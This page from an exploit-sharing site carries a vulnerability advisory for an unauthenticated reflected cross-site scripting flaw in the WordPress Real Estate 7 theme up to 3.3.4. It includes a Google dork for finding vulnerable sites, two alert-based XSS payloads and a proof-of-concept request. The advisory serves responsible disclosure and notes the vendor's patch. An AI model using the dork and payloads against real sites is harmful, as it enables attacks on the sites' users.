0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WordPress Real Estate 7 Theme 3.3.4 Cross Site Scripting Vulnerability
==== [ Z://USB-00_RESEARCH/WORDPRESS/ ] ============================================= [ 2023 ] == Report Title: WordPress Real Estate 7 Theme <= 3.3.4 - Unauthenticated Reflected Cross-Site Scripting (XSS) Google Dork: inurl:/wp-content/themes/realestate-7/ Research Date: 2023-02-10 Researcher: FearZzZz [ https://fearzzzz.ru ] Component Vendor: Contempo Themes [ https://contempothemes.com ] Vulnerable Version: <= 3.3.4 Component Link: https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778 CVSS Base Score: 6.1 (Medium) CVSS Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N OWASP Top 10: A7: Cross-Site Scripting (XSS) CWE: CWE-79 CVE: TBA ================================================================================================= #### [ Description: ] The Real Estate 7 premium theme for WordPress is vulnerable to Reflected Cross-Site Scripting (XSS) attack vector in versions up to, and including, v3.3.4 via the 'ct_additional_features' option due to insufficient input sanitization and output escaping. This vulnerability allows unauthenticated attackers to inject malicious JavaScript payload in the search page that execute if they can trick a user into performing an action such as clicking on a link. #### [ Impact: ] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource. #### [ Payloads: ] ``` <img src=x onerror=(alert)(`FearZzZz`);> ``` ``` <svg/onload=alert(`FearZzZz`)> ``` #### [ Proof-of-Concept: ] https://elementor3.contempothemes.com/?ct_mobile_keyword&ct_keyword=Z&ct_zipcode&search-listings=true&ct_additional_features%5B0%5D=central-forced-air%3Csvg%2Fonload%3Dalert%28%60FearZzZz%60%29%3E GET /?ct_mobile_keyword&ct_keyword=Z&ct_zipcode&search-listings=true&ct_additional_features%5B0%5D=central-forced-air%3Csvg%2Fonload%3Dalert%28%60FearZzZz%60%29%3E HTTP/2 Host: elementor3.contempothemes.com #### [ Timeline: ] 2023.02.08 - Real Estate 7 Theme v3.3.4 released. 2023.02.10 - Vulnerability has been discovered. 2023.02.13 - Vendor notified, received a quick response. 2023.02.13 - Real Estate 7 Theme v3.3.5 released, the vulnerability has been fixed. #### [ Contacts: ] Website: fearzzzz.ru Email: fearzzzz@tutanota.com Twitter: https://twitter.com/fear_zzzz Medium: https://fearzzzz.medium.com GitHub: https://github.com/fearzzzz YouTube: https://youtube.com/@fearzzzz #### [ Notes: ] Special thanks to Chris Robinson (Contempo Themes Founder & CEO) for the quick response and for the respectful communication. # 0day.today [2024-07-07] #